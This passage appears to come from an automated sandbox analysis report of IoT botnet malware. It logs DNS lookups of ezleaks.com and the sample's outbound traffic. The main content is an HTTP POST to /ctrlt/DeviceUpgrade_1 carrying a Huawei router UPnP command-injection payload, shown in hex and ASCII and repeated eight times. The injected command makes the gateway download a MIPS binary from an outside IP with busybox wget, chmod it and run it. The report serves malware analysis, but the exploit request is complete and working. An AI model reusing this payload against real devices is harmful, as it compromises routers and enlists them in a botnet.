                                                          Jan 2, 2024 06:23:52.553452969 CET1426523192.168.2.2381.151.105.189
                                                          Jan 2, 2024 06:23:52.553466082 CET1426523192.168.2.2389.219.246.22
                                                          Jan 2, 2024 06:23:52.553469896 CET1426523192.168.2.23122.95.3.222
                                                          Jan 2, 2024 06:23:52.553471088 CET1426523192.168.2.23187.106.243.162
                                                          Jan 2, 2024 06:23:52.553482056 CET1426523192.168.2.2381.93.1.49
                                                          Jan 2, 2024 06:23:52.553482056 CET1426523192.168.2.2352.66.224.246
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 2, 2024 06:23:41.185658932 CET192.168.2.238.8.8.80x681aStandard query (0)ezleaks.comA (IP address)IN (0x0001)false
                                                          Jan 2, 2024 06:24:21.239294052 CET192.168.2.238.8.8.80xed1bStandard query (0)ezleaks.comA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 2, 2024 06:23:41.312455893 CET8.8.8.8192.168.2.230x681aNo error (0)ezleaks.com93.123.85.91A (IP address)IN (0x0001)false
                                                          Jan 2, 2024 06:24:21.365240097 CET8.8.8.8192.168.2.230xed1bNo error (0)ezleaks.com93.123.85.91A (IP address)IN (0x0001)false
                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          0192.168.2.2334064156.235.102.23037215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:23:48.382924080 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:23:49.266235113 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:23:50.290091991 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:23:52.305815935 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:23:56.305262089 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:04.496103048 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:20.621828079 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:24:52.873330116 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
